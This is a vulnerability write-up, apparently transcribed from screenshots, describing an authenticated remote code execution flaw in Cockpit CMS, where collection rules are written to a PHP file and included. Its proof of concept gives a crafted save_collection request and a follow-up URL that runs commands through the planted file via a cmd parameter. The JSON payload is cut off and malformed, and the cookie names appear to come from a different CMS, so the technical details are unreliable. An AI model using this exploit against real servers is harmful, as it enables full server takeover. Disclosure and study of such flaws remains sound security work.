# Cockpit CMS Authenticated Remote Code Execution Vulnerability ## Vulnerability Overview This is a design-level flaw rather than a standard logic error. The core of the vulnerability lies in Cockpit CMS allowing the definition of "collection rules," with the internal processing flow as follows: 1. **Input Reception**: The controller receives the user-supplied `rules` parameter. 2. **No Validation**: The code performs no validation, filtering, or restriction on the input content. 3. **File Writing**: The user input is written directly into a `.php` file. 4. **Code Execution**: The file is included and executed directly via the `include()` function. **Core Logic Chain**: User Input -> Stored as PHP File -> Server Execution. ## Impact Scope * **Full Remote Code Execution**: Complete remote code execution capability. * **Arbitrary Command Execution**: Ability to execute arbitrary commands. * **Complete Server Compromise**: Full compromise of the server. * **Data Exfiltration**: Potential for data leakage. * **Privilege Escalation Possibilities**: Potential for privilege escalation. ## Remediation * **Remediation**: (Note: The screenshot shows this section header but does not display specific remediation code. Typically, remediation for such vulnerabilities includes strict whitelist validation of user input, prohibiting the direct writing of user input into executable files, avoiding the use of `include` for untrusted files, and employing sandboxing mechanisms.) ## Proof of Concept (POC) **1. Malicious Request** Modify the `save_collection` request in Burp Suite, injecting the payload into the JSON data: ```http POST /cockpit/collections/save_collection HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/json; charset=UTF-8 Cookie: rx_autologin=...; __xe_admin_gnb_tx_... Content-Length: 902 {"collection":{"name":"test","label":"testlabel","color":"","fields":[],"acl":{"*":["collection_edit":true]," ``` **2. Execution Phase** Execute commands using the written PHP file (e.g., `cmd=whoami`): ```http http://localhost/cockpit/storage/collections/rules/test.read.php?cmd=whoami ```